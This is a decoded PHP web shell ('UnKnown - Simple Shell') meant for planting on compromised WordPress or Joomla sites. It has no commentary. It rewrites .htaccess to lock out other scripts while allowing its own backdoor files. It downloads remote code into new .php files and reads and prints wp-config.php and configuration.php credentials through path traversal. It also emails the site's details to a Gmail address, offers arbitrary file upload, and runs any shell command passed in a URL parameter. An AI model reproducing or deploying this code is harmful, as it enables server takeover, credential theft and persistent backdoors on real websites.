/* Decoded by unphp.net */

if(isset($_GET['patch'])) {
	$myfile = fopen(".htaccess", "w+") or die("Unable to open file!");
	$txt  = '<Files ~ "\.(zip|rar|php|php3|php5|php4|phtml|gif|png|phpgif|pHp|PHP|PhP|PHp|pHP|j|J|asp)$">';
	$txt .= "
deny from all
";
	$txt .= "</Files>
";
	$txt .= "<Files 1x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .inc.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .incz.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files 2x.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files gelo.php.j>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files string.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>
";
	$txt .= "<Files .libs.php>
";
	$txt .= "Order Allow,Deny
";
	$txt .= "Allow from all
";
	$txt .= "</Files>";
	
	fwrite($myfile, $txt);
	fclose($myfile);
	exit;
}

if(isset($_GET['clone'])) {
	$req = 0;
	$loc = '';
	
	$source = (isset($_GET['source'])) ? $_GET['source'] : '';
	$file   = (isset($_GET['name'])) ? $_GET['name'] : 'string';
	
	if($_GET['type'] == "wp") {
		$path  = "../../../../../../wp-admin/";
		$path2 = "../../../../../wp-admin/";
		$path3 = "../../../../../../../wp-admin/";
	} else {
		$path  = "../../../images/";
		$path2  = "../../../../images/";
		$path3 = "../../../../../images/";
	}
	
	if(isset($_GET['path'])) {
		$req = 1;
		$loc = $_GET['path'];
	} else {
		if(is_dir($path)) {
			$req = 1;
			$loc = $path;	
		} else {
			if(is_dir($path2)) {
				$req = 1;
				$loc = $path2;	
			} else {
				if(is_dir($path3)) {
					$req = 1;
					$loc = $path3;	
				}
			}
		}
	}
	
	if($req && !empty($loc)) {
		$file = fopen($loc.$file.".php","w+"); 
		$stream = fopen ($source, "r"); 
		while(!feof($stream)) {  
			$shell .=fgets($stream); 
		} 
		fwrite($file, $shell); 
		fclose($file);
	}
	exit;
	
}

if(isset($_GET['j'])){
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	$j = file_get_contents($p1."configuration.php");
	if(!$j) {$j = file_get_contents($p2."configuration.php");
		if(!$j) {$j = file_get_contents($p3."configuration.php");
			if(!$j) {$j = file_get_contents($p4."configuration.php");
				if(!$j) {$j = file_get_contents($p5."configuration.php");
					if(!$j) {$j = file_get_contents($p6."configuration.php");
						if(!$j) {$j = file_get_contents($p7."configuration.php");
							if(!$j) {$j = file_get_contents("configuration.php");
							}
						}
					}
				}
			}
		}
	}
	echo $j;
	exit;
} 

if(isset($_GET['w'])){
	$p1 = "../../../../../../../";
	$p2 = "../../../../../../";
	$p3 = "../../../../../";
	$p4 = "../../../../";
	$p5 = "../../../";
	$p6 = "../../";
	$p7 = "../";
	$w = file_get_contents($p1."wp-config.php");
	if(!$w) {$w = file_get_contents($p2."wp-config.php");
		if(!$w) {$w = file_get_contents($p3."wp-config.php");
			if(!$w) {$w = file_get_contents($p4."wp-config.php");
				if(!$w) {$w = file_get_contents($p5."wp-config.php");
					if(!$w) {$w = file_get_contents($p6."wp-config.php");
						if(!$w) {$w = file_get_contents($p7."wp-config.php");
							if(!$w) {$w = file_get_contents("wp-config.php");
							}
						}
					}
				}
			}
		}
	}
	echo $w;
	exit;
} 

if(isset($_GET['s'])) {
	$host = $_SERVER["HTTP_HOST"]; 
	$uri  = $_SERVER["REQUEST_URI"];
	$serv = gethostbyname($_SERVER['SERVER_ADDR']);
	$addr = gethostbyname($_SERVER['REMOTE_ADDR']); 
	mail("gamekuji@gmail.com", "kiriman bos $host.$uri", "Url: $host.$uri 
Ip :$serv
 Ip injector: $addr");
}

$safe   = @ini_get('safe_mode');
$secure = (!$safe) ? "SAFE_MODE : OFF" : "SAFE_MODE : ON";
echo "<body style='background:#000;color:#64D300;font-size:14px;'>";
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<b>".$secure."</b><br>";
$cur_user = "(".get_current_user().")";
echo "<b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<b>Uname : ".php_uname()."</b><br>";
echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br><input type=hidden name=submit><input type=file name=userfile size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";

if (isset($_POST['submit'])) {
	$uploaddir = pwd();
    if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name'];};
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" :  "Success Upload to " . $uploaddir . $name; 
}

function pwd() {
	$cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
		return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
        
    } elseif($u = strrpos($cwd, '\/')) {
		if($u != strlen($cwd) -1){
			return $cwd.'\/';
		} else{
			return $cwd;
		}
	}
}
echo (isset($_GET['x'])) ? "<pre>" . shell_exec($_GET['x']) . "</pre>" : "<pre>" . shell_exec('ls -la') . "</pre>";